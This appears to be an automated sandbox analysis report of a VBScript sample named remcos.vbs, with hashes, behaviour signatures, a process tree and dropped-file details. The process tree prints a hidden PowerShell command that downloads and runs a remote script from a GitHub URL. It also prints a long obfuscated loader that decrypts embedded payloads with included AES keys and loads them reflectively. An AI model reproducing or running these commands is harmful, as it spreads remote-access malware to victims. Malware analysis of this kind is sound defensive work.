Analysis

  • max time kernel
    117s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    03-12-2024 22:37

General

  • Target

    remcos.vbs

  • Size

    563KB

  • MD5

    f7c17bfb4247e64e22dd52540a4b903b

  • SHA1

    368ba4d02df294fa42efee5e4f330d5e7260d0c3

  • SHA256

    23ca901cd7f4f0ca6b2a652c7467911756241a02e37ebf60c6c09c6224478622

  • SHA512

    5f79d697ba68f6d285d56b8f38587774eb95162be0af3080a14ea9e277b0b33e3c20c8ccd74c6dddcc06eff3aed36b2c5bb096a8b92101c6f27d2603dfb136a4

  • SSDEEP

    12288:eQO27ODRJ7gfddv13rIJQ9HmFboRCuo52CDm09LghGmQ3DnIE2YgdhhC:eN27a7mMJQl2Ac4CDdg8mQPGhhC

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\remcos.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2096
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri 'https://raw.githubusercontent.com/latencyx0/EmptyBuilder/refs/heads/main/remcos.ps1' -UseBasicParsing)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3040
    • C:\Windows\System32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\n1.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2728
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\n1.bat"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2628
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\n1.bat';$QkEK='SplexkUitexkU'.Replace('exkU', ''),'CbUqOrbUqOeabUqOtebUqODecbUqOrbUqOybUqOpbUqOtorbUqO'.Replace('bUqO', ''),'MZgfwaiZgfwnMoZgfwdulZgfweZgfw'.Replace('Zgfw', ''),'FrbSRYomBbSRYasbSRYe6bSRY4StbSRYribSRYnbSRYgbSRY'.Replace('bSRY', ''),'DecaHWxomaHWxpraHWxesaHWxsaHWx'.Replace('aHWx', ''),'IMSwmnMSwmvoMSwmkMSwmeMSwm'.Replace('MSwm', ''),'CoHbycpyTHbycoHbyc'.Replace('Hbyc', ''),'GeBtWttCuBtWtrBtWtrBtWtenBtWttPrBtWtocBtWtessBtWt'.Replace('BtWt', ''),'EynVQntynVQrynVQyPoynVQintynVQ'.Replace('ynVQ', ''),'ChsWdlansWdlgesWdlEsWdlxsWdltesWdlnsWdlsisWdlosWdlnsWdl'.Replace('sWdl', ''),'LHcgboadHcgb'.Replace('Hcgb', ''),'RtuYueatuYudLtuYuituYunetuYustuYu'.Replace('tuYu', ''),'EleDFGgmeDFGgnDFGgtDFGgAtDFGg'.Replace('DFGg', ''),'ThSmVranhSmVsfhSmVormhSmVFihSmVnahSmVlBhSmVlohSmVckhSmV'.Replace('hSmV', '');powershell -w hidden;function zUhpG($Vgbyz){$emkHJ=[System.Security.Cryptography.Aes]::Create();$emkHJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$emkHJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$emkHJ.Key=[System.Convert]::($QkEK[3])('/Hfk3/0HindNj+4DXkevo5htFNrm49tWPnBdwypza2U=');$emkHJ.IV=[System.Convert]::($QkEK[3])('Tm3jafLgvfKY6mYPS/HLjQ==');$uFrFo=$emkHJ.($QkEK[1])();$ghdHz=$uFrFo.($QkEK[13])($Vgbyz,0,$Vgbyz.Length);$uFrFo.Dispose();$emkHJ.Dispose();$ghdHz;}function yGhYh($Vgbyz){$BiDCz=New-Object System.IO.MemoryStream(,$Vgbyz);$rDAyB=New-Object System.IO.MemoryStream;$gTfnb=New-Object System.IO.Compression.GZipStream($BiDCz,[IO.Compression.CompressionMode]::($QkEK[4]));$gTfnb.($QkEK[6])($rDAyB);$gTfnb.Dispose();$BiDCz.Dispose();$rDAyB.Dispose();$rDAyB.ToArray();}$GQdwM=[System.IO.File]::($QkEK[11])([Console]::Title);$asQpo=yGhYh (zUhpG ([Convert]::($QkEK[3])([System.Linq.Enumerable]::($QkEK[12])($GQdwM, 5).Substring(2))));$wqKmU=yGhYh (zUhpG ([Convert]::($QkEK[3])([System.Linq.Enumerable]::($QkEK[12])($GQdwM, 6).Substring(2))));[System.Reflection.Assembly]::($QkEK[10])([byte[]]$wqKmU).($QkEK[8]).($QkEK[5])($null,$null);[System.Reflection.Assembly]::($QkEK[10])([byte[]]$asQpo).($QkEK[8]).($QkEK[5])($null,$null); "
          4⤵
            PID:2680
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2692

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\n1.bat

      Filesize

      562KB

      MD5

      d1d99208a499e870e1e0a34a2cbba829

      SHA1

      85f7090ce76bdae0a07154b27117ec5ac9e9f673

      SHA256

      d302c8c72b06785d8d4af94a118856907e3775becb17253ba62ccd3ddc669879

      SHA512

      badea3d061cdfd1c7929be03d0c4c66eb5cab3091740f935d58a601a56f5be6c372c3ae48bef6ef759581a5c4244885de1c5c02247391bfca7aee5c1c62d7497

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1KXKH7S10596SZ5GLS6N.temp

      Filesize

      7KB

      MD5

      d85e846afd2fcf5dde2fbbeabbfff705

      SHA1

      0c52f9c7bca9203333e2cf2e6d26c252f8322dda

      SHA256

      6d477eb4b026c67a9c935713e33980cd13898e2685e888deaccf49add312b6c0

      SHA512

      b7fe93ced3a42641795915730d8e614acde8aa536efa42c90de34b52ab40c2f75260d4ad5f3ad7d081dc5b24030dc135754234cde38075261542de93ec4fef9d

    • \??\PIPE\srvsvc

      MD5

      d41d8cd98f00b204e9800998ecf8427e

      SHA1

      da39a3ee5e6b4b0d3255bfef95601890afd80709

      SHA256

      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

      SHA512

      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

    • memory/3040-4-0x000007FEF62DE000-0x000007FEF62DF000-memory.dmp

      Filesize

      4KB

    • memory/3040-5-0x000000001B6A0000-0x000000001B982000-memory.dmp

      Filesize

      2.9MB

    • memory/3040-6-0x0000000002040000-0x0000000002048000-memory.dmp

      Filesize

      32KB

    • memory/3040-7-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

      Filesize

      9.6MB

    • memory/3040-8-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

      Filesize

      9.6MB

    • memory/3040-9-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

      Filesize

      9.6MB

    • memory/3040-10-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

      Filesize

      9.6MB

    • memory/3040-11-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

      Filesize

      9.6MB

    • memory/3040-12-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

      Filesize

      9.6MB